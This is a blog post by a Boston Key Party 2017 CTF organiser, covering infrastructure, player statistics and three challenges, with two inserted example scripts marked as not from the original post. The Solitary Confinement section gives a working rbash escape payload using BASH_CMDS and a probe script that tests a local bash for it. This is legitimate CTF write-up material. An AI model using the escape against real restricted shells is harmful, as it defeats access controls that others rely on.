Artificial truth


The Boston Key Party 2017
Mon 27 February 2017

(Screenshot: my splendid css-fu for the BKP)

This year, like the two previous ones, I had the pleasure of helping organise the Boston Key Party, a (hopefully) fun 48-hour-long capture the flag event that serves as a qualifier for the (prestigious) DEF CON one.

Last year, crowell and Amat wrote a really good-looking scoreboard, but it had some performance issues (protip: don't use ncurses on a forking server with several thousand simultaneous users). This is why (and also because we wanted more people to be able to administer the scoreboard easily) this year we went with CTFd, with a (super-ghetto) custom theme (that I wrote in a hurry, mostly with tears and stress).

The whole infrastructure was hosted on AWS: it's cheap (the whole CTF cost us 73 USD), it comes with a CDN (to palliate CTFd's asthmatic behaviour) and a WAF to block the DDoS attack (proudly powered by WordPress xmlrpc.php) that hit the scoreboard around 02:00 (Paris time) on Saturday, and it's dead simple to spawn new machines and wire them together.

Since I'm not an über-proficient sysadmin, it was a fun opportunity to learn things like "How do you manage fork bombs launched from a single Linux user account shared by several hundred people at the same time?" A sensible limits.conf will keep your machine from burning to the ground, but it won't stop people from maxing out the process count and preventing others from logging in. Fortunately, one just has to do something like echo '1 * * * * root killall -u ctfuser -s SIGKILL --older-than 5' >> /etc/crontab to kill processes older than 5 minutes (as written, that schedule fires once an hour at minute one rather than every minute, and psmisc's killall wants a unit on --older-than, so * * * * * root killall -u ctfuser -s SIGKILL --older-than 5m is the line you actually want). Someone mumbled something about using cgroups, but didn't go any further with it.
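An added example of that reaping approach, not from the post or the BKP infrastructure: the same "kill everything of the shared account older than N minutes" job, built on ps(1) instead of psmisc's killall --older-than so it also runs where that option is missing. The install path, the account name "ctfuser" and the sample ps output at the bottom are assumptions constructed for the example.

```shell
#!/bin/sh
# Added example, not from the post: reap every process of one shared
# account that has been alive longer than N minutes. Meant to run from
# cron every minute, e.g. this /etc/crontab line (assumed install path and
# account name):
#   * * * * * root /usr/local/sbin/reap-ctfuser.sh ctfuser 5

# Read "pid etimes" pairs on stdin (etimes = seconds since the process
# started) and print the pids that have been alive for more than $1 seconds.
select_old_pids() {
    awk -v limit="$1" 'NF >= 2 && $2 + 0 > limit { print $1 }'
}

# Kill the processes of user $1 that have lived longer than $2 minutes
# (default 5). Set DRY_RUN=1 to only list what would be killed.
reap_old_procs() {
    user=$1
    limit=$(( ${2:-5} * 60 ))
    # ps -o pid=,etimes= prints one "pid seconds" line per process and no
    # header; -u restricts it to that account (procps syntax).
    ps -u "$user" -o pid=,etimes= 2>/dev/null | select_old_pids "$limit" |
    while read -r pid; do
        if [ -n "$DRY_RUN" ]; then
            echo "would kill $pid"
        else
            kill -KILL "$pid" 2>/dev/null || true
        fi
    done
}

# Self-check on constructed ps output (four fake processes of one user):
# only the two that have been alive longer than 300 s should come back.
sample_run() {
    printf '101 30\n102 301\n103 600\n104 299\n' | select_old_pids 300
}

sample_run
```

The limits.conf half is a single line of the form "ctfuser hard nproc 500" (the number is a placeholder), and because the cap is per account, every player shares it: that is exactly why the reaper is needed. Note the trade-off the threshold makes: anything a player keeps running for longer than the limit dies, including their login shell, so pick the number with the longest legitimate task in mind.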

Thanks to Amazon, we have some random/mildly interesting numbers about the CTF and the players:

  • 43% of the requests to our infrastructure were from the USA, 6% from Korea, 6% from France, 4% from Japan and 4% from the Netherlands.
  • We suffered several DDoS attempts.
  • We served around 335GB of data in 48h, split in 2.5M http requests and 65K https ones.
  • A lot of people tried a fake flag for vimjail, found in /tmp/flag.txt.
  • A bit less than 1300 teams registered, and something like 1000 of them scored at least one point.
  • A bit more than 3000 wrong flags were submitted, and 2000 good ones, for our 23 challenges. We should throttle the number of flag submissions next year, and agree on a flag format (some challs used BKP{}, others bkp{} or FLAG{}).
  • Congratulations to HITCON, b1o0p and PPP for ranking respectively first, second and third.

Along with ensuring that every single task was up, running correctly, and could be managed by anyone in the team (mostly by yelling on Slack at people to get them to document their challenges), and telling random jokes in broken English while doing support on IRC, I also wrote 3 different challenges:

Solitary Confinement

A couple of weeks ago, I was discussing with nurfed how we could improve the 26th level of websec.fr a bit, and he mentioned rbash, but thought that everyone was already sitting on private escapes, since he personally had several.

I wanted to check whether this was true, so I made a simple challenge based on it: escape rbash! In total, 30 teams managed, in 48h, to find various 0days to escape from an rbash shell, in a chroot containing only rbash and a /flag/showFlag binary (along with the libraries required to make those run, of course). The fact that the challenge ran in a super-small chroot killed a lot of exploits that would have worked otherwise. So it seems that nurfed was wrong: not everyone had (or was willing to use) rbash escapes.

I was also wondering whether people would be willing to burn their 0days in writeups or on IRC, or would be wise enough to hoard them. On the other hand, since no one cares about rbash escapes, things would likely have been a bit different with more interesting/widely used sandboxes.

The intended solution was BASH_CMDS[a]=/flag/showFlag;a (PATH isn't writeable, but BASH_CMDS is: it is bash's command hash table, so writing an entry makes "a" resolve straight to /flag/showFlag, with no PATH lookup and without the shell ever seeing a command name containing a slash), but a team found another one based on declare -n. Someone told me that at least one team went completely overkill and wrote a working exploit for a use-after-free in popd to escape the sandbox.
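An added example, not part of the original post or the challenge: a small probe of the BASH_CMDS mechanism against the bash installed locally. It first shows, in an unrestricted bash, that a hash-table entry is enough to run a binary with PATH pointing nowhere, then repeats the intended solution inside bash -r (which is what rbash is) and reports whether that bash version still lets it through. /bin/echo stands in for the challenge's /flag/showFlag, and "bash" being on PATH (override with BASH_BIN) is an assumption; the declare -n variant is not reproduced since the post does not give it.

```shell
#!/bin/sh
# Added example, not from the post: does this bash still let a restricted
# shell seed its command hash table (BASH_CMDS) with a slash-containing
# path? Assumptions: bash is reachable (BASH_BIN to override) and /bin/echo
# exists; it stands in for the challenge's /flag/showFlag.

BASH_BIN="${BASH_BIN:-$(command -v bash || echo /bin/bash)}"
TARGET=/bin/echo

# The mechanism, in an unrestricted bash: with PATH pointing nowhere, the
# only way "a" can resolve is through the hash table, which BASH_CMDS[a]
# writes directly. Prints "escaped" when the hash entry was honoured.
hash_table_demo() {
    "$BASH_BIN" -c 'PATH=/nonexistent; BASH_CMDS[a]="$1"; a escaped' _ "$TARGET" 2>/dev/null
}

# Control: rbash refuses a command name containing "/", so a probe that
# reports "vulnerable" below found a real bypass, not a mis-configured shell.
# Prints "restricted" when bash -r behaves as documented.
restricted_control() {
    if "$BASH_BIN" -r -c "$TARGET direct" >/dev/null 2>&1; then
        echo unrestricted
    else
        echo restricted
    fi
}

# The intended BKP solution inside a restricted shell. Prints "vulnerable"
# when the restricted shell ran $TARGET through the hash entry and
# "blocked" when bash refused the assignment or the lookup.
restricted_probe() {
    out=$("$BASH_BIN" -r -c 'BASH_CMDS[a]="$1"; a escaped' _ "$TARGET" 2>/dev/null)
    if [ "$out" = "escaped" ]; then
        echo vulnerable
    else
        echo blocked
    fi
}

printf 'hash table demo:       %s\n' "$(hash_table_demo)"
printf 'rbash control:         %s\n' "$(restricted_control)"
printf 'rbash BASH_CMDS probe: %s\n' "$(restricted_probe)"
```

The demo part passes on any bash that has BASH_CMDS (4.0 and later); the probe part is the interesting one, since later bash releases check hash-table assignments made in restricted mode, so "blocked" is the expected answer on a current system and "vulnerable" means the box would have fallen to the intended solution.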

Sorry, nurfed, about people finding your escapes, but I'm sure that you still have working ones ;)

Beat in a box

(Photo: Sansa e200v2 running the challenge)

A bit more than 10 years ago (damn.) I bought a Sansa e200v2 and slapped Rockbox on it; it was amazing! Now that I know some C, I thought it would make a great challenge to write a crackme plugin for it. You can find its source code here, and the whole archive here.

Wackusensor

This one was a modified accusensor, worth a complete article on its own ;)

Conclusion

We ran a small survey (powered by Google Forms, sorry), and this is what I retain from it:

  • ~60% of the respondents found the difficulty just right, ~40% found it too hard, and 0% too easy.
  • Solitary Confinement was the most hated challenge ♥
  • ~75% of the respondents thought that 48h is the right duration.
  • ~25% of the respondents didn't join the IRC channel, and ~80% of them wanted updates via the website. We should address this next year.

I have a dump of some of the challenges; feel free to hit me up if you forgot to download your favourite one.

I hope that everyone enjoyed playing it as much as we enjoyed hosting the Boston Key Party; see you next year!